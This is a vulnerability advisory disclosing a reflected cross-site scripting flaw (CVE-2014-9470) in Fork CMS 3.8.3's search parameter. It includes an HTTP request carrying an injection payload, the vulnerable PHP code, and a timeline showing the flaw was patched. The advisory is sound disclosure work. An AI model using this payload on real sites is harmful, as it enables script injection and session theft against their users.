# Exploit Title: XSS Vulnerability in Fork CMS 3.8.3

# Google Dork: N/A

# Date: 12/26/2014

# Exploit Author: Le Ngoc phi (phi.n.le@itas.vn) and ITAS Team (www.itas.vn)

# Vendor Homepage: http://www.fork-cms.com

# Software Link: http://www.fork-cms.com/blog/detail/fork-3.8.4-released

# Version: Fork 3.8.3

# Tested on: N/A

# CVE : CVE-2014-9470 

 

 

::VULNERABILITY DETAIL::

- Vulnerable parameter:  q_widget

- Vulnerable file:       src/Frontend/Modules/Search/Actions/Index.php

- Vulnerable function:   loadForm()

 

- Attack vector:  

      

GET
/en/search?form=search&q_widget="onmouseover="alert('XSS')"&submit=Search
HTTP/1.1

Host: forkcms.local

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101
Firefox/34.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Cookie: track=s%3A32%3A%22f0affe38cada8e7de19ad2edf36f92a6%22%3B;
__utma=23748525.1232410121.1415937482.1419392332.1419480017.3;
__utmz=23748525.1419480017.3.3.utmcsr=google|utmccn=(organic)|utmcmd=organic
|utmctr=(not%20provided);
track=s%3A32%3A%22f0affe38cada8e7de19ad2edf36f92a6%22%3B;
frontend_language=s%3A2%3A%22en%22%3B; _ga=GA1.2.1232410121.1415937482;
PHPSESSID=gailpg881ubvtsmroh2p1bfqn5

Connection: keep-alive

 

- Vulnerable code:

    private function loadForm()

    {

        // create form

        $this->frm = new FrontendForm('search', null, 'get', null, false);

 

        // could also have been submitted by our widget

        if (!\SpoonFilter::getGetValue('q', null, '')) {

            $_GET['q'] = \SpoonFilter::getGetValue('q_widget', null, '');

        }

 

        // create elements

        $this->frm->addText(

            'q',

            null,

            255,

            'inputText liveSuggest autoComplete',

            'inputTextError liveSuggest autoComplete'

        );

 

        // since we know the term just here we should set the canonical url
here

        $canonicalUrl = SITE_URL .
FrontendNavigation::getURLForBlock('Search');

        if (isset($_GET['q']) && $_GET['q'] != '') {

            $canonicalUrl .= '?q=' . $_GET['q'];

        }

        $this->header->setCanonicalUrl($canonicalUrl);

    }

 

 

 

::DISCLOSURE::

- 12/25/2014: Detected vulnerability

- 12/25/2014: Inform vendor and the vendor confirmed

- 12/26/2014: Vendor releases patch

- 12/26/2014: ITAS Team publishes information

 

::REFERENCE::

-
http://www.itas.vn/news/itas-team-found-out-a-cross-site-scripting-vulnerabi
lity-in-fork-cms-70.html

- https://github.com/forkcms/forkcms/issues/1018s

-
https://github.com/forkcms/forkcms/commit/4a7814762adf4f56f932d95146c7e4126d
872114

 

::DISCLAIMER::

THE INFORMATION PRESENTED HEREIN ARE PROVIDED ?AS IS? WITHOUT WARRANTY OF
ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO, ANY
IMPLIED WARRANTIES AND MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE
OR WARRANTIES OF QUALITY OR COMPLETENESS. THE INFORMATION PRESENTED HERE IS
A SERVICE TO THE SECURITY COMMUNITY AND THE PRODUCT VENDORS. ANY APPLICATION
OR DISTRIBUTION OF THIS INFORMATION CONSTITUTES ACCEPTANCE ACCEPTANCE AS IS,
AND AT THE USER'S OWN RISK.


----------------------------------------------------------------------------
----------------

ITAS Team


ITAS Corp.   Be protected with us 
Office     : 24 Dang Thai Mai St., Ward 7, Phu Nhuan District, HCMC.
Tel         : +84 - 8 - 38931952                               Hotline :
0903445711
Email     :   <mailto:info@itas.vn> info@itas.vn
<http://www.itas.vn/> www.itas.vn